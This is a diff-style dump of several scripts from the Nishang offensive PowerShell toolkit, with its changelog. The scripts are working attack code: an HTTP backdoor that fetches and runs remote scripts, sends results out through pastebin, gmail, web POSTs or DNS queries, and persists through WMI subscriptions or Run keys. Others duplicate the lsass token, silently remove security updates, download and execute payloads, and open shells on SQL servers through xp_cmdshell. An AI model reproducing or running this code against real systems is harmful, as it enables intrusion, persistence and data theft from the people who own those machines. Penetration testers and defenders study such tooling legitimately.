Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}

309
aspx/nishang/Backdoors/HTTP-Backdoor.ps1 Normal file
View file

@ -0,0 +1,309 @@
<#
.SYNOPSIS
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER CheckURL
The URL which the payload would query for instructions.
.PARAMETER PayloadURL
The URL from where the powershell script would be downloaded.
.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.
.PARAMETER StopString
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
.PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.Example
PS > HTTP-Backdoor
The payload will ask for all required options.
.EXAMPLE
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
Use above when using the payload from non-interactive shells.
.EXAMPLE
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS <dns>
Use above command for using exfiltration methods.
.EXAMPLE
PS > HTTP-Backdoor -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function HTTP-Backdoor
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$MagicString,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if($filecontent -eq $MagicString)
{
$script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
elseif ($filecontent -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$lengthofsubstr = 0
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$modulename = "HTTP-Backdoor.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
{
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}

108
aspx/nishang/CHANGELOG.txt Normal file
View file

@ -0,0 +1,108 @@
0.3.6.4
- Get-PassHashes does not require SYSTEM privs anymore.
0.3.6.3
- Minor changes to Download-Execute-PS which now allows to pass arguments to scripts.
0.3.6.2
- Invoke-Encode can now output encoded command which could be used to execute scripts in a non-interactive shell.
0.3.6.1
- Powerpreter code made more readable.
- Powerpreter updated for recent changes done to other scripts in Nishang (Egress Testing, New Exfil methods, Bug fixes).
- Powerpreter persistence improved and bugs fixed.
- Bug fixes in HTTP-Backdoor and Execute_OnTime.
- Minor improvements to TextToExe and ExeToText scripts in Utility.
0.3.6
- Added Invoke-Encode.
- Changed compression and encoding methods used by Do-Exfitration, Backdoors, Invoke-Decode, Add-Exfiltration and Keylogger.
0.3.5
- Added Antak Webshell.
0.3.4
- Minor improvements in StringtoBase64.ps1
- Fixed a typo in Firelistener. Client port was not being displayed.
- All the scripts could be run using "dot source" now.
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
- Removed exfiltration support for tinypaste.
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
- Added Nishang.psm1
- Added Do-Exfiltration.ps1.
- Added Add-Exfiltration.ps1.
- Added Invoke-Decode.ps1.
- Removed Browse_Accept_Applet.ps1
0.3.3
- Minor bug fix in Copy-VSS.ps1
- Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).
0.3.2.2
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
- Fixed help in Brute-Force function in Powerpreter.
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
- Added Firebuster.ps1 and Firelistener.ps1
0.3.2.1
- Fixed help and function name in Brute-Force.ps1
0.3.2
- Added Persistence to Keylogger, DNS_TXT_Pwnage, Execute_OnTime, HTTP-Backdoor and Powerpreter.
- Scirpts are now arranged in different directories.
- Added Add-Persistence.ps1 and Remove-Persistence.ps1
- Fixed minor bugs in scripts which use two parameterset.
- Invoke-NinjaCopy has been removed.
0.3.1
- Pivot now accepts multiple computers as input.
- Added Use-Session to interact with sessions created using Pivot.
0.3.0
- Added Powerpreter
- Added Execute-DNSTXT-Code
- Bug fix in Create-MultipleSessions.
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
- More Changes to StringToBase64. Now a file can be converted.
- Added Copy-VSS
- Information_Gather shows output in better format now.
- Information_Gather renamed to Get-Information.
- Wait for command renamed to HTTP-Backdoor.
- Time_Execution renamed Execute-OnTime
- Invoke-PingSweep renamed to Port-Scan
- Invoke-Medusa renamed to Brute-Force
0.2.9
- Run-EXEonRemote now accepts custom arguments for the executable.
- More examples added to the Keylogger.
0.2.8
- Fixed issues while using Get-LSASecret, Get-PassHashes, Get-WLAN-Keys and Information_Gather while using with Powershell v2
0.2.7
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
0.2.6
- Added Create-MultipleSessions script.
- Added Run-EXEonRemote script.
0.2.5
- Added Get-WLAN-Keys payload.
- Added Remove-Update payload.
- Fixed help in Credentials.ps1
- Minor changes in Donwload_Execute and Information_Gather.
0.2.1
- Added Execute-Command-MSSQL payload.
- Removed Get-SqlSysLogin payload
- Fixed a bug in Credentials.ps1
0.2.0
- Removed hard coded strings from DNS TXT Pwnage payload.
- Information Gather now pastes data base64 encoded, does not trigger pastebin spam filter anymore.
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
- Base64ToString now asks for a file containing base64 string. To provide a string in place of file use "-IsString" parameter.
- Browse_Accept_Applet now handles prompts for both 32 bit and 64 bit Internet Explorer. The wait time for the applet to load has also been increased .
- Added Enable_DuplicateToken payload.
- Added Get-LSASecret payload.
- Added Get-SqlSysLogin payload.
- Added Invoke-Medusa payload.
- Added Invoke-PingSweep payload.
0.1.1
- Fixed a bug in Parse_Keys. The function Parse_Keys was not being called.
- Changed help in Wait_For_Command.ps1
- Fixed a bug in Wait_For_Command. $MagicString was not being used instead a fixed string was matched to the result of $checkurl
- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered.
- Added CHANGELOG to repo
- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input.

152
aspx/nishang/Escalation/Enable-DuplicateToken.ps1 Normal file
View file

@ -0,0 +1,152 @@
<#
.SYNOPSIS
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
.EXAMPLE
PS > Enable-DuplicateToken
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Enable-DuplicateToken
{
[CmdletBinding()]
param()
$signature = @"
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv]
[long]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
[IntPtr]$htoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
$tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
$retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
Break
}
$process = (Get-Process -Name lsass)
#$process.name
[IntPtr]$hlsasstoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
[IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
$retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
$retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
}
}

83
aspx/nishang/Escalation/Remove-Update.ps1 Normal file
View file

@ -0,0 +1,83 @@
<#
.SYNOPSIS
Nishang Payload which silently removes updates for a target machine.
.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
.PARAMETER KBID
THE KBID of update you want to remove. All and Security are also validd.
.EXAMPLE
PS > Remove-Update All
This removes all updates from the target.
.EXAMPLE
PS > Remove-Update Security
This removes all security updates from the target.
.EXAMPLE
PS > Remove-Update KB2761226
This removes KB2761226 from the target.
.LINK
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
#>
function Remove-Update {
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes)
{
if ($KBID -eq $HotFix.HotfixId)
{
$KBID = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
Write-Host "Removing $KBID from the target."
Invoke-Expression $RemovalCommand
break
}
if ($KBID -match "All")
{
$KBNumber = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
Write-Host "Removing update $KBNumber from the target."
Invoke-Expression $RemovalCommand
}
if ($KBID -match "Security")
{
if ($HotFix.Description -match "Security")
{
$KBSecurity = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
Write-Host "Removing Security Update $KBSecurity from the target."
Invoke-Expression $RemovalCommand
}
}
while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
{
Start-Sleep 3
Write-Host "Waiting for update removal to finish ..."
}
}
}

67
aspx/nishang/Execution/Download-Execute-PS.ps1 Normal file
View file

@ -0,0 +1,67 @@
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.
.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.
.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
.PARAMETER Nodownload
If this switch is used, the script is not dowloaded to the disk.
.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
The above command does not dowload the script file to disk and executes the evilscript function inside the evilscript.ps1
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Download-Execute-PS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptURL,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$Arguments,
[Switch]
$nodownload
)
if ($nodownload -eq $true)
{
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
if($Arguments)
{
Invoke-Expression $Arguments
}
}
else
{
$webclient = New-Object System.Net.WebClient
$file1 = "$env:temp\deps.ps1"
$webclient.DownloadFile($ScriptURL,"$file1")
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
$pastevalue
}
}

36
aspx/nishang/Execution/Download_Execute.ps1 Normal file
View file

@ -0,0 +1,36 @@
<#
.SYNOPSIS
Nishang Payload to download an executable in text format, convert it to executable and execute.
.DESCRIPTION
This payload downloads an executable in text format, converts it to executable and execute.
Use exetotext.ps1 script to change an executable to text
.PARAMETER URL
The URL from where the file would be downloaded.
.EXAMPLE
PS > Download_Execute http://example.com/file.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download_Execute
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL
)
$webclient = New-Object System.Net.WebClient
[string]$hexformat = $webClient.DownloadString($URL)
[Byte[]] $temp = $hexformat -split ' '
[System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
start-process -nonewwindow "$env:temp\svcmondr.exe"
}

120
aspx/nishang/Execution/Execute-Command-MSSQL.ps1 Normal file
View file

@ -0,0 +1,120 @@
<#
.SYNOPSIS
Nishang payload which could be used to execute commands remotely on a MS SQL server.
.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
or a cmd shell on the target.
.PARAMETER ComputerName
Enter CopmuterName or IP Address of the target SQL server.
.PARAMETER UserName
Enter a UserName for a SQL server administrator account.
.PARAMETER Password
Enter the Password for the account.
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
.LINK
http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html
https://github.com/samratashok/nishang
.NOTES
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
http://www.truesec.com
#>
function Execute-Command-MSSQL {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
[string]
$ComputerName,
[parameter(Mandatory = $true, Position = 1)]
[string]
$UserName,
[parameter(Mandatory = $true, Position = 2)]
[string]
$Password
)
Try{
function Make-Connection ($query)
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
$Connection.Close()
}
"Connecting to $ComputerName..."
Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
"`nEnabling XP_CMDSHELL...`n"
Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
$shell = read-host
while($payload -ne "exit")
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
if ($shell -eq "P")
{
write-host "`n`nStarting PowerShell on the target..`n"
write-host -NoNewline "PS $ComputerName> "
$payload = read-host
$cmd = "EXEC xp_cmdshell 'powershell.exe -Command `"& {$payload}`"'"
}
elseif ($shell -eq "S")
{
write-host "`n`nStarting SQL shell on the target..`n"
write-host -NoNewline "MSSQL $ComputerName> "
$payload = read-host
$cmd = $payload
}
elseif ($shell -eq "C")
{
write-host "`n`nStarting cmd shell on the target..`n"
write-host -NoNewline "CMD $ComputerName> "
$payload = read-host
$cmd = "EXEC xp_cmdshell 'cmd.exe /K $payload'"
}
$Command.CommandText = "$cmd"
$Reader = $Command.ExecuteReader()
while ($reader.Read()) {
New-Object PSObject -Property @{
Name = $reader.GetValue(0)
}
}
$Connection.Close()
}
}
Catch {
$error[0]
}
}

90
aspx/nishang/Execution/Execute-DNSTXT-Code.ps1 Normal file
View file

@ -0,0 +1,90 @@
<#
.SYNOPSIS
Payload which could execute shellcode from DNS TXT queries.
.DESCRIPTION
This payload is able to pull shellcode from txt record of a domain. It has been tested for
first stage of meterpreter shellcode generated using msf.
Below commands could be used to generate shellcode to be usable with this payload
